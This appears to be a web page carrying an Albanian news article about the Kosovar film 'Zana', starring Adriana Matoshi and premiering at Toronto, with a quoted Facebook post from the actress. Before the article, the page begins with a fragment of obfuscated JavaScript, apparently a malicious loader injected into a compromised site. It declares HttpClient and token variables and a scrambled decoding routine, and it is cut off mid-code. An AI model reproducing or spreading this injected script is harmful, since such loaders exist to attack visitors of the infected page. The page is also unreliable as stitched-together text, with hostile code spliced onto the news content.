;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Për herë të parë në historinë shqiptare, një film kosovar me premierë në Toronto

By

ZANA është një portret shkatërrues i traumës së pasluftës. Është përhumbëse dhe e qetë, me një ndjenjë të frikës së përgjumur në çdo cep.

Filmi i ri kosovar “Zana”, personazhin e të cilit e portretizon aktorja kosovare Adriana Matoshi do të mbajë premierën në Toronto, gjë e cila po ndodh për herë të parë në kimetagrafinë shqiptare.

E vendosur në një fshat të vogël në Kosovë, ZANA eksploron amësinë, pikëllimin dhe mistikën. Lume (Adriana Matoshi) është një guaskë e një gruaje që vajton për një humbje të dhunshme, të pashpjegueshme me të cilën të tjerët duket se janë pajtuar.

Mund ta ndiqni triler-in më poshtë:

Sonte për herë të parë në historinë shqiptare, premierë botërore në Toronto do të jetë një film kosovar. Kosova ka një histori, ka artistë, një zemër dhe forcë për t’i thënë botës që ne dimë. Falënderoj të gjithë ata në këtë jetë që besojnë në mua, dhe falënderoj Antonetën që më besoi me këtë rol të fortë të Lumes. Unë kurrë nuk do të arrij vetëm, pa përkrahjen e artistëve, dhe sonte do të ndriçoj me veshjen e Drenusha Xharra … Familja ime e dashur dhe miqtë e mi janë motivimi im! Sonte do të mbaj duart e juaja sepse e di që do jeni të gjithë me mua. Më uroni fat, ju dua shumë! – shkroi Matoshi në postimin e saj në Facebook.

Image may contain: 1 person, standing

Artikuj të ngjashëm